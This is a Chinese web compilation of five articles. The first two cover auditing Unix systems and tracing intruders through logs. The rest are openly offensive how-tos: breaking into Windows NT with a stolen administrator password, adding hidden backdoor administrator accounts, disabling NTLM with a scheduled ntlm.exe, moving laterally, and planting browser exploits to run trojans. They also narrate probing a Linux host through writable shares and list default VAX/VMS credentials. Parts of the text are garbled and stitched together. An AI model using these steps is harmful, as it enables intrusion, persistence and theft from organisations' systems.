下面是小编整理的如何检查系统入侵Windows系统,本文共10篇,欢迎阅读分享,希望对大家有所帮助。
篇1:如何检查系统入侵Windows系统
像find和secure这样的程序称为检查程序,它们搜索文件系统,寻找出SUID/ SGID文件,设备文件,任何人可写的系统文件,设有口令的登录用户,具有相同UID /GID的用户等等. (1)记帐 UNIX记帐软件包可用作 安全 检查工具,除最后登录时间的记录外,记帐系 统还能保存全天
像find和secure这样的程序称为检查程序,它们搜索文件系统,寻找出SUID/ SGID文件,设备文件,任何人可写的系统文件,设有口令的登录用户,具有相同UID /GID的用户等等.
(1)记帐
UNIX记帐软件包可用作安全检查工具,除最后登录时间的记录外,记帐系 统还能保存全天运行的所有进程的完整记录,对于一个进程所存贮的信息包括 UID,命令名,进程开始执行与结束的时间,CPU时间和实际消耗的时间,该进程 是否是root进程,这将有助于系统管理员了解系统中的用户在干什么.acctcom 命令可以列出一天的帐目表.有明,系统中有多个记帐数据文件,记帐信息保存 在文件/usr/adm/pacct*中,/usr/adm/pacct是当前记录文件,/usr/adm/pacctn 是以前的记帐文件(n为整型数).若有若干个记帐文件要查看,可在acctcom命 令中指定文件名:
acctcom /usr/adm/pacct? /usr/adm/pacct
要检查的问题的其中之一是:在acctcom的输出中查找一个用户过多的登 录过程,若有,则说明可能有人一遍遍地尝试登录,猜测口令,企图非法进入系 统.此外,还应查看root进程,除了系统管理员用su命令从终端进入root,系统 启动,系统停止时间,以及由init(通常init只启动getty,login,登录shell), cron启动的进程和具有root SUID许可的命令外,不应当有任何root进程.
由记帐系统也可获得有关每个用户的CPU利用率,运行的进程数等统计数据.
(2)其它检查命令
*du:报告在层次目录结构(当前工作目录或指定目录起)中各目录占用的 磁盘块数.可用于检查用户对文件系统的使用情况.
*df:报告整个文件系统当前的空间使用情况.可用于合理调整磁盘空间的 使用和管理. *ps:检查当前系统中正在运行的所有进程.对于用了大量CPU时间的进程, 同时运行了许多进程的用户,运行了很长时间但用了很少CPU时间的 用户进程应当深入检查.还可以查出运行了一个无限制循环的后台进 程的用户,未注销户头就关终端的用户(一般发生在直接连线的终端).
*who:可以告诉系统管理员系统中工作的进展情况等等许多信息,检查用 户的登录时间,登录终端.
*su:每当用户试图使用su命令进入系统用户时,命令将在/usr/adm/sulog 文件中写一条信息,若该文件记录了大量试图用su进入root的无效操 作信息,则表明了可能有人企图破译root口令.
*login:在一些系统中,login程序记录了无效的登录企图(若本系统的 login程序不做这项工作而系统中有login源程序,则应修改login). 每天总有少量的无效登录,若无效登录的次数突然增加了两倍,则表 明可能有人企图通过猜测登录名和口令,非法进入系统.
这里最重要的一点是:系统管理没越熟悉自己的用户和用户的工作习惯, 就越能快速发现系统中任何不寻常的事件,而不寻常的事件意味着系统已被人 窃密.
(3)安全检查程序的问题
关于以上的检查方法的一个警告,若有诱骗,则这些方法中没有几个能防 诱骗.如find命令,如果碰到路径名长于256个字符的文件或含有多于200个文件的目录,将放弃处理该文件或目录,用户就有可能利用建立多层目录结构或 大目录隐藏SUID程序,使其逃避检查(但find命令会给出一个错误信息,系统管 理员应手工检查这些目录和文件).也可用ncheck命令搜索文件系统,但它没有 find命令指定搜索哪种文件的功能.
如果定期存取.profile文件,则检查久未登录用户的方法就不奏效了.而 用户用su命令时,除非用参数-,否则su不读用户的.profile. 有三种方法可寻找久未登录的帐户:
UNIX记帐系统在文件/usr/adm/acct/sum/login中为每个用户保留了最 后一次登录日期.用这个文件的好处是,该文件由系统维护,所以可完全 肯定登录日期是准确的.缺点是必须在系统上运行记帐程序以更新 loginlog文件,如果在清晨(午夜后)运行记帐程序,一天的登录日期可 能就被清除了.
. /etc/passwd文件中的口令时效域将能告诉系统管理员,用户的口令是 否过期了,若过期,则意味着自过期以来,户头再未被用过.这一方法的 好处在于系统记录了久未用的户头,检查过程简单,且不需要记帐系统所需要的磁盘资源,缺点是也许系统管理员不想在系统上设置口令时效, 而且这一方法仅在口令的最大有效期(只有几周)才是准确的.
系统管理员可以写一个程序,每天(和重新引导系统时)扫描/etc/wtmp, 自己保留下用户最后登录时间记录,这一方法的好处是不需要记帐程序, 并且时间准确,缺点是要自己写程序.
以上任何方法都可和/usr/adm/sulog文件结合起来,查出由login或su登录户头的最后登录时间 如果有人存心破坏系统安全,第一件要做的事就是寻找检查程序.破坏者 将修改检查程序,使其不能报告任何异常事件,也可能停止系统记帐,删除记帐 文件,使系统管理员不能发现破坏者干了些什么.
(4)系统泄密后怎么办?
发现有人已经破坏了系统安全的时候,这时系统管理员首先应做的是面对 肇事用户.如果该用户所做的事不是蓄意的,而且公司没有关于“破坏安全”的规章,也未造成损坏,则系统管理员只需清理系统,并留心该用户一段时间.如果该用户造成了某些损坏,则应当报告有关人士,并且应尽可能地将系统恢复 到原来的状态.
如果肇事者是非授权用户,那就得做最坏的假设了:肇事者已设法成为root 且本系统的文件和程序已经泄密了.系统管理员应当想法查出谁是肇事者,他 造成了什么损坏?还应当对整个文件做一次全面的检查,并不只是检查SUID和 SGID,设备文件.如果系统安全被一个敌对的用户破坏了,应当采用下面的步骤:
关系统,然后重新引导,不要进入多用户方式,进入单用户方式.
安装含有本系统原始UNIX版本的带和软盘.
将/bin,/usr/bin,/etc,/usr/lib中的文件拷贝到一个暂存目录中.
将暂存目录中所有文件的校验和(用原始版本的sum程序拷贝做校验和,不要用/bin中的suM程序做)与系统中所有对就的文件的校验和进行比 较,如果有任何差别,要查清差别产生的原因.如果两个校验和不同,是由于安装了新版本的程序,确认一相是否的确是安装了新版本程序.如 果不能找出校验和不同的原因,用暂存目录中的命令替换系统中的原有命令.
在确认系统中的命令还未被窜改之前,不要用系统中原命令.用暂存目录中的shell,并将PATH设置为仅在暂存目录中搜索命令.
根据暂存目录中所有系统命令的存取许可,检查系统中所有命令的存取 许可.
检查所有系统目录的存取许可,如果用了perms,检查permlist文件是否 被窜改过.
如果系统UNIX(/unix)的校验和不同于原版的校验和,并且系统管理员 从未修改过核心,则应当认为,一个非法者“很能干”,从暂存缓冲区重新 装入系统.系统管理员可以从逐步增加的文件系统备份中恢复用户的文件,但是在检查备份中的“有趣”文件之前,不能做文件恢复.
改变系统中的所有口令,通知用户他们的口令已改变,应找系统管理员 得到新口令当用户来要新口令时,告诉用户发生了一次安全事故,他们应查看自己 的文件和目录是否潜伏着危害(如SUID文件,特洛依木马,任何人可写的目录),并报告系统管理员任何异乎寻常的情况. 设法查清安全破坏是如何发生的?如果没有肇事者说明,这也许是不可能弄清的如果能发现肇事者如何进入系统,设法堵住这个安全漏洞.
第一次安装UNIX系统时,可以将shell,sum命令,所有文件的校验和存放在 安全的介质上(带,软盘,硬盘和任何可以卸下并锁焉起来的介质).于是不必再 从原版系统带上重新装入文件,可以安装备份介质,装入shell和sum,将存在带上的校验和与系统中文件的校验和进行比较.系统管理员也许想自己写一个计 算校验和的程序,破坏者将不能知道该程序的算法,如果将该程序及校验和保 存在带上,这一方法的保密问题就减小到一个物理的安全问题,即只需将带锁起来.
原文转自:www.ltesting.net
篇2:Unix的入侵追踪Windows系统
作者:NCX 在 UNIX 系统遭受入侵后,确定损失及入侵者的攻击源地址相当重要,虽然在大多数入侵者懂得使用曾被他们攻陷的机器作为跳板来攻击你的 服务器 可在他们发动正式攻击前所做的目标信息收集工作(试探性扫描)常常是从他们的工作机开始的,本篇介绍如
作者:NCX
在UNIX系统遭受入侵后,确定损失及入侵者的攻击源地址相当重要。虽然在大多数入侵者懂得使用曾被他们攻陷的机器作为跳板来攻击你的服务器可在他们发动正式攻击前所做的目标信息收集工作(试探性扫描)常常是从他们的工作机开始的,本篇介绍如何从遭受入侵的系统的日志中分析出入侵者的IP并加以确定的。
1.messages
/var/adm是UNIX的日志目录(linux下则是/var/log)。有相当多的ASCII文本格式的日志保存之下,当然 ,让我们把焦点首先集中在messages 这个文件,这也是入侵者所关心的文件,它记录了来自系统级别的信息。在这里,大量的日志记录对于我们是无用的。
比如:
Apr 25 21:49:30 unix: Copyright (c) 1983-, Sun Microsystems, Inc.
Apr 25 21:49:30 2000 unix: mem = 262144K (0x10000000)
这样显示版权或者硬件信息的记录而:
Apr 29 19:06:47 www login[28845]: FAILED LOGIN 1 FROM xxx.xxx.xxx.xxx ,
User not known to the underlying authentication module
这样的登录失败记录:
Apr 29 22:05:45 game PAM_pwdb[29509]: (login) session opened for user ncx by (uid=0)因此第一步应该是 Kill -HUP cat `/var/run/syslogd.pid`(当然,有可能入侵者已经帮我们做过了,那样我们得不到任何有用信息)
在下面这个网址你可以找到大量的日志审计分析工具或者脚:
www.securityfocus.com/templates/tools_category.html?category=2&platform=&path=[%20auditing%20][%2-0log%20analysis%20]
2.wtmp,utmp logs,ftp日志
你能够在/var/adm,/var/log,/etc目录中找到名为wtmp,utmp的文件,这记录着用户何时,何地telnet上主机, 在 中最古老也是最流行的zap2(编译后的文件名一般叫做z2,或者是叫wipe). 也是用来抹掉在这两个文件中用户登录的信息的,然而由于懒惰或者糟糕的网络速度(>3秒的echo就令人崩溃,而我经常遇见10 倍于此的回显时间 ,很多入侵者没有上载或编译这个文件,管理员所需要就是使用lastlog这个命令来获得入侵者上次连接的源地址( 当然,这个地址有可能是他们的一个跳板)ftp日志一般是/var/log/xferlog,该文本形式的文件详细的记录了以FTP 方式上传文件的时间,来源,文件名等等。不过由于该日志太明显,所以稍微高明些的入侵者几乎不会使用该方法来传文件。而使用rcp的较普遍些.当然你可以
3.sh_history
在获得root 权限后,入侵者建立了他们自己的入侵帐号,更高级的技巧是给类似uucp,lp不常使用的系统用户名加上密码。在遭受入侵后,即使入侵者删除了.sh_history或者.bash_hi-story 这样的文件,执行kill -HUP `cat /var/run/inetd.conf`即可将保留在内存页中的bash命令记录重新写回到磁盘,然后执行find / -name.sh_historyprint,仔细查看每个可疑的shell命令日志。尤其是当你在/usr/spool/lp(lp home dir),/usr/lib/uucp/(uucp home dir)这样的目录下找了.sh_history文件时。往往入侵者在需要目标机和工作机传送文件时为了避免被syslog,可能使用从目标机ftp到工作机的方法,因此在sh_history中你有可能发现类似ftp xxx.xxx.xxx.xxx或者rcpnobody@xxx.xxx.xxx.xxx:/tmp/backdoor /tmp/backdoor这样显示出入侵者IP或域名的命令。
5.http服务器日志
这很有可能是确定入侵者的真实攻击发源地的最有效方法。以最流行的apache服务器为例,在${prefix}/logs/ 目录下你可以发现aclearcase/“ target=”_blank“ >ccess.log这个文件,该文件记载了访问者的IP,访问的时间和请求访问的内容,
在遭受入侵后,我们应该可以在该文件中发现类似下面的:recordxx.xxx.xxx.xxx - - [28/Apr/2000:00:29:05 -0800] ”GET/cgi-bin/rguest.exe“404 -xxx.xxx.xxx.xxx - - [28/Apr/2000:00:28:57 -0800] ”GET /msads/Samples/SELECTOR/showcode.asp“ 404 -来自IP为xxx.xxx.xxx.xxx的某人在4月28号的0点28分试图访问/msads/Samples/SELECTOR/showcode.asp文件,这是在使用web cgi扫描器后遗留下的日志。大部分的web扫描器都是基于MS操作系统的,而为了更快的速度,使用基于*nix的扫描器的入侵者常选择离自己最近的服务器。结合攻击时间和IP,我们可以知道入侵者的大量信息。
6.核心dump
这是一种相对较复杂的方法,但是也有效 。一个安全稳定的守护进程在正常运行的时候是不会dump出系统的核心,当入侵者利用远程漏洞攻击时,许多服务正在执行一个getpeername的socket 函数调用(参见socket编程),因此入侵者的IP也保存在内存中,此时服务overflow ,系统p 内存页文件被dump到core文件,这意味着你可能在一大段杂乱无章的字符中(事实上是一个全局数据库中的进程变量)找到一个包含有执行此expoloit的IP。BTW: 这段是参考了members.tripod.com/mixtersecurity/paper.html后写出的,我做了一个cmsd的远程攻击测试,但只在中间找到了入侵者远程overflow的部分命令,没有找到IP。不过这仍有理由相信Mixter(paper.html的作者)的话。
7.代理服务器日志
代理是大中型企业网常使用来做为内外信息交换的一个接口,它忠实地记录着每一个用户所访问的内容,当然,也包括入侵者的访问内容。以最常用的squid代理为例,通常你可以在/usr/local/squid/logs/下找到access.log 这个庞大的日志文件,当然,由于日志记录添加得很快,在安全事故后应该及时备份它。你可以在以下地址获得squid的日志分析脚本:www.squid-cache.org/Doc/Users-Guide/added/stats.html通过对敏感文件访问日志的分析,可以知道何人在何时访问了这些本该保密的内容。
8.路由器日志
默认方式下路由器不会记录任何扫描和登录,因此入侵者常用它做跳板来进行攻击。如果你的企业网被划分为军事区和非军事区的话,添加路由器的日志记录将有助于日后追踪入侵者。更重要的是,对于管理员来说,这样的设置能确定攻击者到底是内贼还是外盗。当然,你需要额外的一台服务器来放置router.log文件。
在CISCO路由器上:
router(config) router(config) router(config) 在log server上:
I.在/etc/syslog.conf中加入一行:
*.info /var/log/router.log
II.生成文件日志文件:
touch /var/log/router.log
III.重起syslogd进程:
kill -HUP `cat /var/run/syslogd.pid`
对于入侵者来说,在实施攻击的整个过程中不与目标机试图建立tcp连接是不太可能的,这里有许多入侵者主观和客观的原因, 而且在实施攻击中不留下日志也是相当困难的。如果我们花上足够的时间和精力,是可以从大量的日志中分析出我们希望的信息。 就入侵者的行为心理而言,他们在目标机上取得的权限越大,他们就越倾向于保守的方式来建立与目标机的连接 。仔细分析早期的日志,尤其是包含有扫描的部分,我们能有更大的收获。
日志审计只是作为入侵后的被动防御手段。主动的是加强自身的学习,及时升级或更新系统。做到有备无患才是最有效的防止入侵的方法。
wuzy 回复于:-02-24 14:29:11老乡!
顶一下!
hjczwd 回复于:2003-02-24 22:19:34[quote:dca8a92995=”wuzy“]老乡!
顶一下![/quote:dca8a92995]
muzx 回复于:2003-02-25 00:19:31顶一下!
①① 回复于:2003-02-25 09:01:59我顶!顶
流浪着的鱼 回复于:2003-03-11 20:39:46ding
东吴 回复于:2003-03-11 21:36:53ding
zw033 回复于:2003-03-11 22:33:31up
原文转自:www.ltesting.net
篇3: 如何入侵WindowsNT系统
现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“ ”的攻击引来了企业信息安全危机……
得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗,
如何入侵WindowsNT系统
。但到底能做什么呢?能详细答出来的只怕不会很多,而且很多企业系统管理员就认为密码为空没什么,因为他们压根就不知道“ ”会怎么做。本文介绍的就是得到NT的管理员密码以后入侵一个企业计算机群的初级和中级手法,尤其是在一个大型企业当中,企业系统管理员的密码往往关系着整个公司的信息泄密,以及公司的数据的丢失,严重的影响到一个企业的发展和生存。
首先,我们先假定得到了某个企业的一台服务器192.168.0.1的Administrator的密码,而对方没有关闭139端口。
1.普通共享资源的入侵
这种入侵手法可说是NT最简单的入侵了。随便在自己机器的哪个窗口的地址栏里输入“\\\\192.168.0.1”大概等1-2秒,对方就会要求你输入用户名和密码,输入所得到的用户名和密码以后就可以进入,并可以看到这台服务器在企业中的共享资源了。由于权限是Admin所以你几乎可以删除对方共享资源里的任何东西。(如果设置了共享为只读那就没办法了)
2.默认及隐藏共享资源的入侵
在说这种入侵方法之前我先来给大家介绍一个NT的IPC$连接,在默认情况下NT系统有一个特殊的隐藏共享,就是IPC$共享。IPC$是专门用在NT中的一种管道通讯,NT系统之间的通讯大部分都在IPC$通讯中完成的。
这次手法相对高明一点,但还是很简单的。不过关键还是要看“ ”如何利用了,有的人可能只能删删文件,有的人却可以利用这个留下后门,以便下次如果密码改变了后可以利用后门进入。同样在机器里随便打开一个窗口,在地址栏输入“\\\\192.168.0.1”就会要求输入密码,输入以后所看到的东西和前面介绍的一样。好了,现在同时也建立好IPC$连接了,其实在提示你输入密码时从输入窗口中也知道了是建立IPC$连接。然后我们再次在地址栏输入地址,这次输入的就有点不同了,输入“\\\\192.168.0.1\\c$”大概过一会就出现了对方C盘里所有的内容了。想看对方D盘吗?同样,输入“\\\\192.168.0.1\\D$”就看见对方D盘了。然后想换这个企业的主页(假如对方还是一个Web服务器)可以说是轻而易举。记住由于权限是管理员当然可以写了,留不留后门就看“ ”的想法咯。一般他们会在C盘(假设在C:\\\\WINNT下)建立一个批处理文件,假设文件名为hack.bat,其内容一般为:
net user hack 1234 /add (建立一个用户名为hack的用户,密码为1234) net localgroup administrators hack /add (让hack也是管理员) del C:\\Documents and Settings\\Administrator\\开始\\菜单\\程序\\启动\\hack.lnk (删除启动文件夹里的快捷方式消除足迹) del c:\\winnt\\hack.bat (删除hack.bat这个文件消除足迹)
这样当企业系统管理员在下次登陆时就会偷偷的添加一个用户了。当然其实添加用户算是一个比较愚蠢的留“后门”的方法了,所以其实很多“ ”会放一个可以常驻内存的小程序,然后建立一个类似的批处理文件和快捷方式,那么“ ”基本上可以长期的占有企业中的这台主机了。
3.IPC$连接入侵的高级手段
然而每个“ ”都不可能那么笨,非要一直等到下次企业系统管理员登陆以后才可以占有,往往“ ”会使用更加巧妙的手法,迅速的留下后门。首先他们还是先建立IPC$连接,连接以后他们会使用各种手法开后门,比如打开Telnet服务,“ ”怎么打开Telnet服务呢?其实有很多种方法,比如微软公司自己就出了一个小程序“netsvc.exe”就是专门让系统管理员在建立IPC$连接以后远程打开服务用的管理工具,但这个工具到了“ ”手中自然也成了必不可少的“ ”工具了。在命令符下输入“netsvc \\\\192.168.0.1 telnet /start”大概等5分钟对方的Telnet服务就打开了,然后“telnet 192.168.0.1”嘿嘿……等!需要NTLM验证,这下又把“ ”拦在了外面了,这时他们又会用到一个小程序了,就是专门关闭一个NTLM验证的程序ntlm.exe。(当然也可以是其他名字)“copy ntlm.exe \\\\192.168.0.1\\admin$\\system32”把ntlm.exe复制到对方企业服务器的system32目录下。复制过去了,可怎么让他运行呢?当然多的是办法了。“net time \\\\192.168.0.1”看看对方系统时间为多少假设为18:00。现在再输入“at \\\\192.168.0.1 18:02 ntlm.exe”,等一会后,命令提示符显示新加任务 ID=1,意思是对方系统在18:02时运行ntlm.exe这个程序,等到18:02以后,然后再“telnet 192.168.0.1”这回是提示需要输入用户和密码了,输入所得到的管理员用户名和密码以后就成功的Telnet到了企业服务器了……
不过这样一下是Netsvc,一下又是At实在是麻烦,现在就介绍另一个方法,首先还是先感谢微软为NT系统管理员提供的方便的管理功能,这一功能到了“ ”手中可说是“ ”的福音,不用“ ”再这么麻烦的输入这样那样的命令了,
建立好IPC$连接以后(IPC$连接果然是一种功能非常强大的管理连接),打开本地计算机里的“计算机管理”,用鼠标右键点计算机管理窗口里的“计算机管理(本地)”里面有“连接到另一台计算机”选择它,在“名称”里输入“192.168.0.1”确定以后,首先你的NT系统会看是否建立IPC$连接,“有”就连接上去了,现在你就可以直接管理192.168.0.1了,比如看他的日志,启动他的服务(当然包括Telnet了),管理他的IIS,什么都有。多研究一下,连注销对方系统当前登陆的用户,重新启动对方计算机,关闭对方计算机都有,真是强大。NT系统到了“ ”手中,整个系统都成了一个“ ”工具了,而且是功能非常强大的“ ”工具。启动了Telnet了,可还是要NTLM验证怎么办?简单,在本地计算机建立一个用户名和密码相同的用户,如果已有就把密码改为相同,然后使用这个用户在本地重新登陆,“telnet 192.168.0.1”嘿嘿~连密码都不用输入了!因为通过NTLM验证了啊。
现在那些安全意识差的企业系统管理员们知道了暴露了管理员密码的危险性了吧?还没完呢。都到这一步了还没完?机器都被“ ”完全控制了呀――是的,还没完,看吧!
4.深入入侵
这一步就需要“ ”有丰富的经验,实战操作能力要求很高,也不再是文字能描述清楚的了,下面就只能粗略的介绍一下。
“ ”当然不会仅仅在攻馅一台服务器以后就立刻罢手了,他会深入入侵你的内网,尤其是在一个企业中,往往都是计算机群。那些商业间谍“ ”当然就更加的想入侵到企业内部去了。而很多企业系统管理员喜欢把所有的服务器的密码设为相同,就给“ ”提供了一个良好的入侵条件。Telnet到对方服务器以后,输入“net view”企业中整个一个工作组或域的计算机这时都一展无余。同样在Telnet里建立IPC$连接以后象入侵这台服务器一样的入侵了。前面说的建立IPC$连接都是使用的图形界面,然而这时候已经不再拥有图形界面了,现在假设企业内网的192.168.0.2的密码和这台服务器密码相同,这时可以使用“net use \\\\192.168.0.2\\IPC$ passwd/user:username”来建立IPC$连接了,然后是映射驱动盘,输入“net use z: \\\\192.168.0.2\\c$”这样就把192.168.0.2的C盘映射到192.168.0.1的Z盘去了。输入“z:”就可以象浏览192.168.0.1的硬盘一样,浏览192.168.0.2的C盘。而如果他是商业间谍“ ”,一旦发现里面有价值的东西自然不用说将来会发生什么事了。当然这往往还算是最好的条件,其实还是有相当一部分企业系统管理员不会把密码设为一样的。现在就看网络的情况了,如果入侵的正好是一台主域控制器,嘿嘿,那对于商业间谍来说可是高兴死了,赶快把自己升级成域管理员,这下整个企业的一个域的机器都落在了他的手中。当然在“ ”手中这也算是一种非常好的情况,但现在微软行行色色的漏洞越来越多,同时也根据“ ”的经验的多少,决定着入侵内网的机会的大小。
在一个企业中,往往直接连接Internet的是Web服务器。而一个有耐性的“ ”,一个想入侵这个企业的商业间谍当然会不惜一切手段入侵,其中一个手法就是利用Web服务。微软公司在今年出现的MIME漏洞就有很好的利用价值。这里顺便介绍一下MIME漏洞,MIME在处理不正常的MIME类型中存在问题,攻击者可以建立一个包含可执行文件的附件的HTML,E-mail并修改MIME头,使IE不正确处理这个MIME,而执行所指定的可执行文件附件。有了这个漏洞,“ ”将会更换Web服务器的主页,在主页里把MEMI漏洞攻击代码插进HTML中,使得企业内部的员工在浏览自己公司主页时运行指定的程序。(企业内部绝对不可能从来不看自己的主页的,尤其是企业负责人,他们一般都会不定期的检查主页。)那么他们在浏览自己的主页时就无声无熄的执行了“ ”所指定的程序,这个程序可能是木马,也可能同样是添加用户的批处理文件。
由上面可以看出一旦NT系统的密码泄露是一件多么危险的事情,尤其在一个企业当中。同时一个企业的拓扑是否合理也起着非常重要的作用,并且“ ”尤其是商业间谍所利用的手法远远不只有这些,他们还可以利用其它方式,比如电子邮件等各种途径来得到企业内部的敏感信息或保密信息。
5.其它入侵
其它还可以通过3389端口入侵。3389是Win2000系统的自带的,并且是图形界面的,远程管理服务的端口。“ ”一旦有了管理员密码,危险性也更加直观化。另外就是通过IIS的管理入侵,在默认情况下IIS提供一个Web方式的管理服务,在c:\\inetpub\\wwwroot里有一个叫iisstar.asp的东西,如果可以访问,而且有管理员密码(NT4里不是管理员也可以,只要是NT的合法账号)就可以远程通过Web方式管理IIS信息服务,然后通过特殊手法进一步控制整个机器,然后是整个企业……
篇4:如何入侵Linux系统
我发现了一个网站,于是常规入侵,很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果一个帐号也不存在,我没有再试它的帐号。因为我被它开的端口吸引住了,它开着WWW,我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在。有几个错误,但我不知道如何利用,算了。又绕着主机转了几圈,象狐狸遇见刺猬,无从下嘴。
还是看看root的信息吧:
finger root@xxx.xxx.xxx Login name: root In real life: system PRIVILEGED account Directory: / Shell: /bin/sh Last login Fri Jul 28 09:21 on ttyp0 from xx.xx.xx No Plan.
root经常来,那个202.xx.xx.xx就是他用的工作站了,从那会不会看到点东西呢?
net view \\\\xx.xx.xx Shared resources at \\\\xx.xx.xx Sharename Type Comment x x 我的公文包 The command was completed successfully.
在上网的机器上开着WINDOWS的“文件和打印机共享”的服务,是很多人容易掉以轻心的,这个root没有例外,
如果它的C盘共享了而且可写那就好了,但那是做梦,现在开了共享的目录没有一个是根目录,连D驱的都没有。别着急,慢慢来。x掉的那些文件夹都没用,不能写,里面尽是些英文原著,这个root还挺行的。“我的公文包”吸引了我的注意,这是一个用于将不同的机器上的资料进行同步的工具,很显然这个root要经常更新主机上的主页,有时候在自己的机器上编,有时候在主机上编……所以很重要的一点:“我的公文包”的共享一般都是可写的!
那我再进去看看。
>net use i: \\\\xx.xx.xx >i: >echo asdf>temp.txt
不错,确实可写。
>del temp.txt
不留痕迹―― 的习惯。
>dir/od/p
看看都有些什么…… 倒数第二排那个是什么?“X月工作计划.doc”!就是它了,既然是计划就不可能写完了就丢一边,它肯定会再次打开它的――至少下个月写计划时要COPY一下:->
篇5:入侵间谍卫星系统技术
1.VAX: VAX的全称是Virtual Address Extension,VAX计算机是由于硬件条件的限制,被设计
来储存地址的,使它能够很简便的操作一些很大的适合于储存的程序。 VAX计算机系统是
DES(Digital Equipment Corporation)公司设计的。普遍的VAX系列的包括一些桌上型VAX系统使用
的是大型机上的处理器。这些系列的计算机变得越来越小,如MicroVAX计算机逐渐升级,像一些中
等大小的11/7XX系列到最新的6000系列的。这些计算机系统普遍的使用一种开放型的系统VMS。
VMS: VMS全称Virtual Memory System.VMS操作系统非常类似于其他的开放型的系统。DEC公司
利用这种系统将他们公司的计算机应用于商业和工程行业,在这之前,VMS系统仅仅被应用于单机系
统中。VMS公司构思了一条发展之路,将他们的VMS系统融入一些基本的计算机管理应用于个人家庭
用户和一些其它的计算机系统。
DCL: DCL全称Digital Command Language.它使VMS系统的基础语言。你们那些人中有IBM系统
,你能想象DCL程序类似于批处理文件。你能够用它做很多事情。(比PC-DOS或者MS-DOS更多)但是
它的工作都是使用一些基本而又相同的方法。有一个差别就是你在DCL程序里想要显示任何文件之前
必须在提示符前面输入“$”符号。DCL程序通常调用COM为扩展名的文件时是很快捷的。当你没有执
行一个COM或DCL程序的文件时,几乎在DCL处理器里总是显示某些文件。
2.
当你进入一个VAX系统的时候,你将会看到一些类似于下面的界面:
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
WELCOME
TO THE
AT&T MICROVAX II SYSTEM
Username: (username here)
Password: (password here... does not echo)
$ (<-- this is your prompt)
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GETTING IN A VAX BY ERROR:
=========================
你将知道如果你有一个VAX显示系统,如果你得到用户名和密码的提示符,那么下面将会帮助你
猜测密码。
GETTING IN A VAX BY ERROR:
=========================
我在这里将只告诉你一件事情。VMS 4.X和特别的VMS4.4系统是金山,宝库。我现在不是进入
到这个系统内部,因为它有很多的解释不适合于我们攻击的范围。你能够在ARPANET和USENET中发现
很多这样的讨论。你还能从COMPUSERVE信息服务中获得这方面的信息,比特的信息交换中,DES公司
的VAX的BBS中。在VMS5.1系统中存在一个很大的漏洞,但是这个漏洞还不是很严重。如果我发送足
够的请求,我将能够用另外的信息覆盖这条信息。
利用缺省设置进入VAX计算机:
当安装这些VAX系统的时候,系统存在几个缺省的账号可以进入。这些账号的密码在系统与系
统之间是不会改变的。这个系统的管理员应该删除这些账号或者改变密码,但是这些缺省账号在很
长的时间内是不会被人所知的。下面我将列出这些缺省的账号:
USERNAME PASSWORD
-------- --------
DECNET DECNET
* SYSTEST UETP
SYSTEST
SYSTEM SYSTEM
DEFAULT DEFAULT
* FIELD FIELD
OPERATIONS OPERATIONS
* SUPPORT SUPPORT
DEC
SYSTEST_CLIG CLIG
SYSTEST
TEST
在我列出了一些密码的地方,我发现了这些用户名都有很多缺省得密码。在这些旁边有星号的
缺省账号都是一些非常强壮的账号。
VAX VMS 命令:
当你得到”$“符号的时候,你将能够显示出一百多个命令。我将介绍几个比较常用的:
@ 执行这个程序。当你想要运行DCL BATCH或*.COM文件,你必须在这些文件前面输入@。
EX:@LOGIN.COM;3
ACCOUNTING - 这是一个运行账号的程序。 如果你退出一个系统的时候,你能够发现屏幕上
显示出你从进入这个系统到退出这个系统所用的时间,在这段时间中,这个账号是在被使用当中的
。如果你账号资料忘记的话,你可以在系统管理员在系统内的时候输入这个命令来获取你的资料。
CREATE -显示任何文件。 如果你在你电脑内的PASCAL编译器中编写了一个程序,你可以上传
这个文件到VAX计算机内用这个CREATE命令执行。
EX:CREATE program.pas;1
CREATE/DIR - 这将会为你建立一个空目录。 我将说明一下怎样在一分钟内去得到一个VAX
系统。看看SET命令。
EX:CREATE/DIR NameOfDir
DELETE - 被用来删除文件或者清除空目录。 删除一个文件,显示出“DEL FILENAME.EXT;X”
删除一个空目录,首先删除目录内的所有文件,“DEL/LOG *.*;*”下一步,你可以设
置一个保护:“SET PROTECTION=OVNER:D DIRNAME.DIR” 下一步,删除这个目录:“DEL
DIRNAME.DIR”
EX:DEL DAVID.TXT;4
DIRECTORY - 显示你文件所存在的目录。增加“/BRIEF”命令将会给列出一个短的列表,增加“
/FULL”将会给你一个整屏的列表包括每个文件的安全信息。你可以使用DIR命令和通配符来缩短文
件的长度。“*”号能表示任何长度的文件。”%“能够表示任何一个字母。
EDIT -这个命令为是编写者设计的。有很多VAX系统都是使用类似于MS-DOS/PC-DOS命令行的
编写器。无论如何,很多VAX计算机系统都是使用EDT/EVE编辑器来进行编辑的。你能够用这个编辑
器很快的做很多事情。但是仅仅使用你的终端来控制它是很困难的。VT-100运行的速度是非常慢的
。如果你使用EDT/EVE编辑器进行编辑的时候,你可以试着用VT-220终端系统来登陆。
HELP - 这个命令是HELP程序。
LIBRARY -被用来存档用的。 如果你是个新手的话,你可以不使用这个命令。我现在提起它
是因为我将把它打印出来和更多的人就VAX系统左一个更深层次的讨论。
LOGOUT - 退出系统。
MAIL - 加载MAIL程序。 被用来发送MAIL给其他用户,在VAX连上INTERNET的时候,也可
以用来给网络上发送EMAIL。同时,它还能够发送数据给计算机。
$PASSWORD - 修改密码。
EX:$PASSWORD MYNEWPASS
PHONE -这个命令是被用来和其他用户对话的。这个命令是比其他命令都要优越的。一旦PHONE
命令被执行后,你的”$“提示符将可以被“%”提示符。如果你想要对某个人发送信息的话,就先显
示你的用户名。如果你在不同的节点给某人发送信息,就显示出你的节点名,两个冒号,和他的用
户名。你花费很多时间才会发现这个漏洞。(特别是学校的电脑。)但是改变与网络通讯的MAIL和
PHONE命令。
EX: PHONE
% node13::dlight
PHOTO -记录会议。
RUN -运行可执行文件。
SET -这个有很多用法。
SHOW -这个也包括很多,但是没有SET的用法多。我现在列出SHOW命令的使用方法。
EX:SHOW USERS DAV
CLUSTER -VAX串
